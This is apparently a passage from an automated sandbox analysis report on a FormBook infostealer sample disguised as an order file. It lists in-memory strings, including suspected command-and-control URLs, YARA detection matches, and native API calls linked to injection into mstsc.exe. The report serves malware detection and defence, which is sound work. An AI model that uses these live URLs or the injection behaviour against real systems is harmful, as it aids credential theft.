          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7S

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Order 122001-220 guanzo.exe
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004181BC NtCreateFile,1_2_004181BC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041826A NtReadFile,1_2_0041826A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004182EC NtClose,1_2_004182EC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,1_2_0041839B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019299A0 NtCreateSection,LdrInitializeThunk,1_2_019299A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019295D0 NtClose,LdrInitializeThunk,1_2_019295D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01929910
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929540 NtReadFile,LdrInitializeThunk,1_2_01929540
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019298F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_019298F0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929840 NtDelayExecution,LdrInitializeThunk,1_2_01929840
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01929860
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929780 NtMapViewOfSection,LdrInitializeThunk,1_2_01929780
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019297A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_019297A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929FE0 NtCreateMutant,LdrInitializeThunk,1_2_01929FE0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929710 NtQueryInformationToken,LdrInitializeThunk,1_2_01929710
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019296E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_019296E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01929A00
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A20 NtResumeThread,LdrInitializeThunk,1_2_01929A20
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A50 NtCreateFile,LdrInitializeThunk,1_2_01929A50
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01929660
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019299D0 NtCreateProcessEx,1_2_019299D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019295F0 NtQueryInformationFile,1_2_019295F0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192AD30 NtSetContextThread,1_2_0192AD30
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929520 NtWaitForSingleObject,1_2_01929520
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929950 NtQueueApcThread,1_2_01929950
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929560 NtWriteFile,1_2_01929560
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019298A0 NtWriteVirtualMemory,1_2_019298A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929820 NtEnumerateKey,1_2_01929820
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192B040 NtSuspendThread,1_2_0192B040
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192A3B0 NtGetContextThread,1_2_0192A3B0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192A710 NtOpenProcessToken,1_2_0192A710
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929B00 NtSetValueKey,1_2_01929B00
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929730 NtQueryVirtualMemory,1_2_01929730
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929770 NtSetInformationFile,1_2_01929770
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192A770 NtOpenThread,1_2_0192A770
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929760 NtOpenProcess,1_2_01929760
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A80 NtOpenDirectoryObject,1_2_01929A80
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019296D0 NtCreateKey,1_2_019296D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929610 NtEnumerateValueKey,1_2_01929610
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A10 NtQuerySection,1_2_01929A10
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929650 NtQueryValueKey,1_2_01929650
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929670 NtQueryInformationProcess,1_2_01929670
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19860 NtQuerySystemInformation,LdrInitializeThunk,3_2_04B19860
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19840 NtDelayExecution,LdrInitializeThunk,3_2_04B19840
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B199A0 NtCreateSection,LdrInitializeThunk,3_2_04B199A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B195D0 NtClose,LdrInitializeThunk,3_2_04B195D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_04B19910
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19540 NtReadFile,LdrInitializeThunk,3_2_04B19540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B196E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04B196E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B196D0 NtCreateKey,LdrInitializeThunk,3_2_04B196D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04B19660
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19650 NtQueryValueKey,LdrInitializeThunk,3_2_04B19650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A50 NtCreateFile,LdrInitializeThunk,3_2_04B19A50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19780 NtMapViewOfSection,LdrInitializeThunk,3_2_04B19780
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19FE0 NtCreateMutant,LdrInitializeThunk,3_2_04B19FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19710 NtQueryInformationToken,LdrInitializeThunk,3_2_04B19710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B198A0 NtWriteVirtualMemory,3_2_04B198A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B198F0 NtReadVirtualMemory,3_2_04B198F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19820 NtEnumerateKey,3_2_04B19820
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1B040 NtSuspendThread,3_2_04B1B040
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B195F0 NtQueryInformationFile,3_2_04B195F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B199D0 NtCreateProcessEx,3_2_04B199D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1AD30 NtSetContextThread,3_2_04B1AD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19520 NtWaitForSingleObject,3_2_04B19520
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19560 NtWriteFile,3_2_04B19560
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19950 NtQueueApcThread,3_2_04B19950
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A80 NtOpenDirectoryObject,3_2_04B19A80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A20 NtResumeThread,3_2_04B19A20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19610 NtEnumerateValueKey,3_2_04B19610
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A10 NtQuerySection,3_2_04B19A10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A00 NtProtectVirtualMemory,3_2_04B19A00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19670 NtQueryInformationProcess,3_2_04B19670
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1A3B0 NtGetContextThread,3_2_04B1A3B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B197A0 NtUnmapViewOfSection,3_2_04B197A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19730 NtQueryVirtualMemory,3_2_04B19730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1A710 NtOpenProcessToken,3_2_04B1A710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19B00 NtSetValueKey,3_2_04B19B00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19770 NtSetInformationFile,3_2_04B19770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1A770 NtOpenThread,3_2_04B1A770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19760 NtOpenProcess,3_2_04B19760
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008581C0 NtCreateFile,3_2_008581C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008582F0 NtClose,3_2_008582F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00858270 NtReadFile,3_2_00858270
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008583A0 NtAllocateVirtualMemory,3_2_008583A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008581BC NtCreateFile,3_2_008581BC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008582EC NtClose,3_2_008582EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085826A NtReadFile,3_2_0085826A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085839B NtAllocateVirtualMemory,3_2_0085839B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADBB2680_2_0ADBB268
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB3AB80_2_0ADB3AB8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB3A600_2_0ADB3A60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB4B700_2_0ADB4B70
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB4B610_2_0ADB4B61
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB48880_2_0ADB4888
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB34400_2_0ADB3440
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB00400_2_0ADB0040
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB48770_2_0ADB4877
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB6C180_2_0ADB6C18
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB34110_2_0ADB3411
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB6C080_2_0ADB6C08
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB00070_2_0ADB0007
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB89980_2_0ADB8998
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB89880_2_0ADB8988
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004010271_2_00401027
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041C82E1_2_0041C82E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041A2A61_2_0041A2A6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041BABD1_2_0041BABD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00408C1A1_2_00408C1A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B5041_2_0041B504
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041CE2B1_2_0041CE2B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019125811_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B25DD1_2_019B25DD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FD5E01_2_018FD5E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EF9001_2_018EF900
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B2D071_2_019B2D07
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E0D201_2_018E0D20
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019041201_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1D551_2_019B1D55
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB0901_2_018FB090
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A01_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B20A81_2_019B20A8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F841F1_2_018F841F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A10021_2_019A1002
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191EBB01_2_0191EBB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019ADBD21_2_019ADBD2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1FF11_2_019B1FF1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B2B281_2_019B2B28
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B22AE1_2_019B22AE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B2EF71_2_019B2EF7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01906E301_2_01906E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A03_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA20A83_2_04BA20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB0903_2_04AEB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE841F3_2_04AE841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B910023_2_04B91002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B025813_2_04B02581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AED5E03_2_04AED5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD0D203_2_04AD0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF41203_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADF9003_2_04ADF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA2D073_2_04BA2D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA1D553_2_04BA1D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA22AE3_2_04BA22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA2EF73_2_04BA2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF6E303_2_04AF6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0EBB03_2_04B0EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA1FF13_2_04BA1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9DBD23_2_04B9DBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA2B283_2_04BA2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085C82E3_2_0085C82E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085A2A63_2_0085A2A6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00848C1A3_2_00848C1A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00848C603_2_00848C60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00842D903_2_00842D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B5043_2_0085B504
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085CE2B3_2_0085CE2B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00842FB03_2_00842FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04ADB150 appears 35 times
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: String function: 018EB150 appears 35 times
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000000.00000000.663743680.0000000000128000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.708232981.0000000000F08000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.709376627.0000000003653000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exeBinary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
